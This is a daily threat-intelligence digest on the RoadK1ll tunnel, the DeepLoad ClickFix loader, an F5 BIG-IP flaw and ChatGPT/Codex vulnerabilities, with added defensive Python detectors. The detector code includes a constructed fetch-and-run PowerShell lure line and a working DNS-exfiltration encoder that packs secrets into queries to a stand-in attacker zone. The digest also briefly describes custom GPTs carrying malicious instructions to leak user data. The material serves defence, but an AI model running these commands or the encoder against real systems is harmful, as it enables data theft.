Cyware Daily Threat Intelligence, March 31, 2026

The barrier between internal networks and the open web is thinning as new implants and AI vulnerabilities turn trusted systems into launchpads for data theft. The lightweight RoadK1ll reverse tunneling tool lets attackers pivot through compromised environments over a custom WebSocket protocol, turning infected machines into relay points that reach internal services not exposed to the internet.
Phishing has entered a new phase of automation with DeepLoad, a loader that pairs ClickFix social engineering with AI-assisted obfuscation to slip past static scanners. The malware evades monitoring while extracting browser credentials and installing browser extensions that capture credentials in real time.
The trust placed in AI ecosystems is being tested as researchers uncover fundamental weaknesses in how OpenAI handles data and credentials. A newly disclosed flaw in ChatGPT's code execution runtime allowed sensitive user data to be exfiltrated through a covert DNS side channel.
Top Malware Reported in the Last 24 Hours
New RoadK1ll malware enables network pivoting
A newly identified implant named RoadK1ll lets attackers move through compromised networks over a custom WebSocket-based protocol. Discovered by Blackpoint during an incident response engagement, the lightweight reverse tunneling tool turns an infected machine into a relay: the implant opens an outbound connection to attacker-controlled infrastructure, and the attacker then forwards traffic through that connection to internal services and systems that are not reachable from outside. Because the channel is initiated from inside the network and looks like ordinary outbound WebSocket traffic, it can pass as legitimate egress. The protocol supports several commands, including opening TCP connections to internal hosts and managing the flow of data over them, and a reconnection routine re-establishes the channel whenever it is interrupted. RoadK1ll has no traditional persistence mechanism, however: access lasts only as long as the implant process is running, so terminating the process or rebooting the host severs the tunnel.
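The behaviour described above gives defenders something to hunt for even without the implant's wire format, which the report does not publish. The following Python is an added example, not Blackpoint's detection logic and not tied to RoadK1ll's actual protocol: it walks constructed HTTP proxy log lines and flags hosts that keep re-establishing long-lived WebSocket sessions (HTTP 101 Switching Protocols) to an endpoint nobody else in the estate talks to, with real volume in both directions. The log format, host names, RFC 5737 addresses and thresholds are all assumptions for the example.

```python
"""Hunt for WebSocket reverse-tunnel candidates in HTTP proxy logs.

Constructed example. Keys on the behaviour in the write-up: one host makes
long-lived outbound WebSocket sessions to a single external endpoint, pushes
traffic both ways, and reconnects whenever the channel drops.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed proxy log. Fields: time, host, src_ip, dst, method, path,
# status, duration_s, bytes_client_to_server, bytes_server_to_client.
SAMPLE_LOG = """\
2026-03-31T08:00:01Z ws-fin-07 10.20.5.17 203.0.113.45:443 GET /api/ws 101 3600 4112233 9876543
2026-03-31T09:00:04Z ws-fin-07 10.20.5.17 203.0.113.45:443 GET /api/ws 101 3598 2222222 7000000
2026-03-31T10:00:06Z ws-fin-07 10.20.5.17 203.0.113.45:443 GET /api/ws 101 3601 3100000 8100000
2026-03-31T11:00:09Z ws-fin-07 10.20.5.17 203.0.113.45:443 GET /api/ws 101 3599 1900000 6200000
2026-03-31T08:15:00Z ws-mkt-03 10.20.6.21 198.51.100.8:443 GET /socket.io/ 101 540 20000 90000
2026-03-31T09:30:00Z ws-mkt-03 10.20.6.21 198.51.100.8:443 GET /socket.io/ 101 610 18000 85000
2026-03-31T09:31:00Z ws-eng-11 10.20.7.5 198.51.100.8:443 GET /socket.io/ 101 600 22000 91000
2026-03-31T09:32:00Z ws-hr-02 10.20.8.9 198.51.100.8:443 GET /socket.io/ 101 590 19000 88000
2026-03-31T09:33:00Z ws-fin-07 10.20.5.17 192.0.2.10:443 GET /index.html 200 1 800 12000
"""


@dataclass
class Session:
    ts: str
    host: str
    src: str
    dst: str
    path: str
    status: int
    duration: int
    c2s: int
    s2c: int


def parse_log(text):
    """Parse the whitespace-separated constructed format into Session records."""
    sessions = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, src, dst, _method, path, status, dur, c2s, s2c = line.split()
        sessions.append(Session(ts, host, src, dst, path, int(status),
                                int(dur), int(c2s), int(s2c)))
    return sessions


def tunnel_candidates(sessions, min_sessions=3, max_fan_in=1,
                      min_bytes=1_000_000, min_duration=600):
    """Return (host, dst, session_count, total_bytes) for suspicious pairs.

    Only 101 responses count: that is the WebSocket upgrade. A (host, dst)
    pair is flagged when the host keeps re-establishing the session (the
    reconnect loop), almost no other host in the estate talks to that
    endpoint (no SaaS-style fan-in), the sessions are long-lived, and both
    directions carry real volume (proxied traffic, not a chat heartbeat).
    """
    upgrades = [s for s in sessions if s.status == 101]
    fan_in = defaultdict(set)
    for s in upgrades:
        fan_in[s.dst].add(s.host)
    pairs = defaultdict(list)
    for s in upgrades:
        pairs[(s.host, s.dst)].append(s)
    findings = []
    for (host, dst), group in pairs.items():
        if len(group) < min_sessions or len(fan_in[dst]) > max_fan_in:
            continue
        long_lived = [s for s in group if s.duration >= min_duration]
        if len(long_lived) < min_sessions:
            continue
        c2s = sum(s.c2s for s in group)
        s2c = sum(s.s2c for s in group)
        if min(c2s, s2c) < min_bytes:
            continue
        findings.append((host, dst, len(group), c2s + s2c))
    return findings


if __name__ == "__main__":
    for finding in tunnel_candidates(parse_log(SAMPLE_LOG)):
        print("possible WebSocket tunnel:", finding)
```

The fan-in test is what separates a tunnel from a collaboration tool: a legitimate WebSocket service is contacted by many hosts, while a reverse tunnel endpoint is contacted by exactly the one that is implanted. Since the implant has no persistence, the reconnect loop is also the moment to catch it; once the process is gone, so is the evidence on the host.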
DeepLoad malware uses ClickFix for theft
DeepLoad is a loader that uses the ClickFix social engineering tactic to get itself executed and then steals browser credentials. It relies on AI-assisted obfuscation and process injection to evade detection. The chain begins with a lure that tricks the user into running PowerShell commands themselves. The malware then disables PowerShell command history to limit what is recorded, writes a temporary Dynamic Link Library (DLL) to the user's Temp directory to sidestep file-based detection, and uses asynchronous procedure call (APC) injection to run its payload inside a legitimate Windows process such as LockAppHost.exe. Beyond extracting saved browser passwords, DeepLoad installs malicious browser extensions that capture credentials in real time. It can also reinfect the host through Windows Management Instrumentation (WMI), which gives it persistence that needs no further user interaction.
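Each step in that chain leaves a host-side trace, and the steps are rarely seen together on a benign machine. The Python below is an added example, not the researchers' rules and not Windows tooling: a small correlator over constructed Sysmon-style events that scores a host when several DeepLoad-like signals (ClickFix-style PowerShell launch, disabled PowerShell history, a DLL dropped under %TEMP%, PowerShell taking a handle on LockAppHost.exe, a WMI subscription being created) appear together. The event IDs, field names and the exact command-line strings, including the PSReadLine option used to represent "history disabled", are assumptions that mirror common Sysmon output rather than details quoted from the report.

```python
"""Host-side hunt for a DeepLoad-like execution chain over Sysmon-style events.

Added example with constructed events. Indicators follow the write-up; the
event shapes and strings are assumptions, not published IOCs.
"""
from collections import defaultdict


def _ends(value, suffix):
    return (value or "").lower().endswith(suffix.lower())


# Each rule is a predicate over one event dict. Event IDs follow Sysmon:
# 1 process create, 10 process access, 11 file create, 19-21 WMI events;
# 4104 is PowerShell script-block logging.
RULES = {
    # ClickFix: the victim pastes the lure into Run/PowerShell, so the
    # interactive shell is the parent and the command is hidden/encoded.
    "clickfix_powershell": lambda e: (
        e["id"] == 1
        and _ends(e.get("image"), "\\powershell.exe")
        and _ends(e.get("parent"), "\\explorer.exe")
        and any(k in e.get("cmd", "").lower()
                for k in ("-w hidden", "-enc", "iex", "invoke-expression"))
    ),
    # History disabled via PSReadLine (assumed mechanism for the example).
    "history_disabled": lambda e: (
        e["id"] in (1, 4104)
        and "historysavestyle" in e.get("cmd", "").lower()
        and "savenothing" in e.get("cmd", "").lower()
    ),
    # PowerShell writes a DLL into the user's Temp directory.
    "temp_dll": lambda e: (
        e["id"] == 11
        and _ends(e.get("image"), "\\powershell.exe")
        and "\\appdata\\local\\temp\\" in e.get("target", "").lower()
        and _ends(e.get("target"), ".dll")
    ),
    # PowerShell opens a handle on LockAppHost.exe: APC injection needs a
    # thread handle in the target, so this precedes the injection itself.
    "lockapphost_access": lambda e: (
        e["id"] == 10
        and _ends(e.get("image"), "\\powershell.exe")
        and _ends(e.get("target"), "\\lockapphost.exe")
    ),
    # A WMI filter, consumer or binding is created: the reinfection hook.
    "wmi_persistence": lambda e: e["id"] in (19, 20, 21),
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: one infected host, one admin doing ordinary work.
EVENTS = [
    {"host": "WS-FIN-07", "id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": 'powershell -w hidden -c "iex (iwr https://lure.example.test/fix)"'},
    {"host": "WS-FIN-07", "id": 4104,
     "cmd": "Set-PSReadLineOption -HistorySaveStyle SaveNothing"},
    {"host": "WS-FIN-07", "id": 11, "image": PS,
     "target": r"C:\Users\alice\AppData\Local\Temp\tmp9F3A.dll"},
    {"host": "WS-FIN-07", "id": 10, "image": PS,
     "target": r"C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockAppHost.exe"},
    {"host": "WS-FIN-07", "id": 20, "cmd": "CommandLineEventConsumer Name=Updater"},
    {"host": "WS-IT-01", "id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe"},
    {"host": "WS-IT-01", "id": 11, "image": PS,
     "target": r"C:\Users\bob\AppData\Local\Temp\report.csv"},
]


def correlate(events, min_rules=3):
    """Return {host: sorted rule names} for hosts hitting >= min_rules rules.

    Correlating distinct stages is what keeps this quiet: an explorer-spawned
    PowerShell alone is routine, a Temp-directory write alone is routine,
    but three or more of these stages on one host in a short window is not.
    """
    hits = defaultdict(set)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[e["host"]].add(name)
    return {h: sorted(r) for h, r in hits.items() if len(r) >= min_rules}


if __name__ == "__main__":
    for host, rules in correlate(EVENTS).items():
        print(f"{host}: {len(rules)} DeepLoad-like stages -> {', '.join(rules)}")
```

Two caveats for production use: Sysmon's default configuration does not log every process access or WMI event, so the `lockapphost_access` and `wmi_persistence` rules need the corresponding filters enabled; and because the payload runs inside LockAppHost.exe, the browser-credential theft itself will be attributed to that process, which is why the handle-open event is the cheapest place to catch the injection.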
Top Vulnerabilities Reported in the Last 24 Hours
F5 BIG-IP vulnerability exploited in attacks
F5 has reclassified a vulnerability in BIG-IP APM (Access Policy Manager), originally published as a denial-of-service (DoS) issue, as a critical remote code execution (RCE) flaw. Tracked as CVE-2025-53521, it allows attackers with no prior privileges to execute code on unpatched devices, specifically those running certain access policy configurations. F5 warned that the vulnerability is being actively exploited to deploy webshells, and CISA has added it to its Known Exploited Vulnerabilities (KEV) catalog. With more than 240,000 BIG-IP instances exposed online, how many of them run a vulnerable configuration remains unclear.
OpenAI patches vulnerabilities in ChatGPT, Codex
A newly disclosed vulnerability in OpenAI's ChatGPT allowed sensitive user data to be exfiltrated covertly over DNS, a channel that the existing egress controls did not cover. The flaw lay in the Linux runtime behind ChatGPT's code execution feature; exploiting it could give an attacker remote shell access and let them run commands without the user's knowledge. The risk is greater with custom GPTs, which could carry malicious instructions in their configuration so that the leak happens with no visible sign to the user. Separately, a critical command injection vulnerability in OpenAI's Codex platform could expose GitHub credentials, allowing attackers to execute arbitrary commands and reach users' code repositories.
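DNS works as an exfiltration channel because a sandbox that blocks outbound HTTP usually still lets name resolution through, and the resolver forwards whatever label it is asked for to the zone's authoritative server. The Python below is an added example, not OpenAI's runtime and not the researchers' proof of concept (the report does not publish their encoding): it shows the generic mechanism, base32-encoding data into numbered subdomain labels of an attacker-controlled zone and reassembling them on the other side, and then a detector of the kind that would catch it in resolver logs. The zone, the payload and the benign query names are constructed for the example; the two-label "registered domain" rule is a simplification that production code should replace with the Public Suffix List.

```python
"""DNS side-channel exfiltration: the encoding, and a detector for it.

Added example with constructed names and payload. Not OpenAI's sandbox and
not the researchers' PoC; it demonstrates the generic technique only.
"""
import base64
import math
from collections import defaultdict

EXFIL_ZONE = "collect.example.test"   # attacker-controlled zone (constructed)
LABEL_MAX = 63                         # RFC 1035 label length limit
CHUNK = 48                             # base32 characters per label, under LABEL_MAX

# Constructed payload standing in for whatever sits in the sandbox.
PAYLOAD = (
    b"user=alice@example.test\n"
    b"session=deadbeefcafef00d1234\n"
    b"api_key=sk-constructed-example-not-a-real-key-0000\n"
    b"notes=Q1 forecast draft, do not share outside finance\n"
    b"card=4111111111111111 exp=12/29\n"
    b"ssh=-----BEGIN OPENSSH PRIVATE KEY----- (truncated, constructed)\n"
)


def exfil_queries(data: bytes, zone: str = EXFIL_ZONE) -> list:
    """Attacker side: turn bytes into ordered DNS names <seq>.<chunk>.<zone>.

    base32 is used because DNS names are case-insensitive, so base64 would
    not survive a resolver that lowercases labels."""
    text = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [text[i:i + CHUNK] for i in range(0, len(text), CHUNK)]
    names = [f"{seq}.{chunk}.{zone}" for seq, chunk in enumerate(chunks)]
    assert all(len(label) <= LABEL_MAX for n in names for label in n.split("."))
    return names


def reassemble(names, zone: str = EXFIL_ZONE) -> bytes:
    """What the attacker's authoritative server does with its query log:
    order the chunks by sequence number, restore padding, decode."""
    suffix = "." + zone
    parts = {}
    for n in names:
        if n.endswith(suffix):
            seq, chunk = n[:-len(suffix)].split(".", 1)
            parts[int(seq)] = chunk
    text = "".join(parts[i] for i in sorted(parts)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def registered_domain(name: str) -> str:
    # Assumption for the example: the last two labels are the registered
    # domain. Production code should consult the Public Suffix List.
    return ".".join(name.rstrip(".").split(".")[-2:])


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def flag_dns_exfil(queries, min_unique=6, min_avg_len=30, min_avg_entropy=2.5) -> dict:
    """Defender side: group query names by registered domain and flag domains
    receiving many distinct, long, non-repetitive subdomains. Thresholds are
    illustrative; tune them against your own resolver baseline."""
    subs = defaultdict(set)
    for q in queries:
        q = q.rstrip(".")
        dom = registered_domain(q)
        if q != dom:
            subs[dom].add(q[:-len(dom) - 1])
    flagged = {}
    for dom, names in subs.items():
        if len(names) < min_unique:
            continue
        avg_len = sum(len(s) for s in names) / len(names)
        avg_ent = sum(entropy(s.replace(".", "")) for s in names) / len(names)
        if avg_len >= min_avg_len and avg_ent >= min_avg_entropy:
            flagged[dom] = {"unique": len(names), "avg_len": round(avg_len, 1),
                            "avg_entropy": round(avg_ent, 2)}
    return flagged


# Constructed benign resolver traffic for comparison.
BENIGN_QUERIES = [
    "www.example.org", "mail.example.org", "api.example.org",
    "cdn1.images.example.org", "login.example.org",
    "d1a2b3c4e5f6g7.cdn-provider.test", "d1a2b3c4e5f6g7.cdn-provider.test",
]


if __name__ == "__main__":
    queries = exfil_queries(PAYLOAD)
    print(f"{len(queries)} DNS queries carry {len(PAYLOAD)} bytes; first: {queries[0]}")
    print("flagged:", flag_dns_exfil(BENIGN_QUERIES + queries))
```

The detector counts distinct subdomains per domain rather than looking at any single query, because one long hashed label is normal for CDNs and telemetry endpoints, while a stream of never-repeating long labels under one zone is the signature of data being pushed out. For a code execution sandbox the stronger control is on the other side of the channel: resolve names only through a resolver that refuses queries for zones outside an allowlist, so the lookup never leaves.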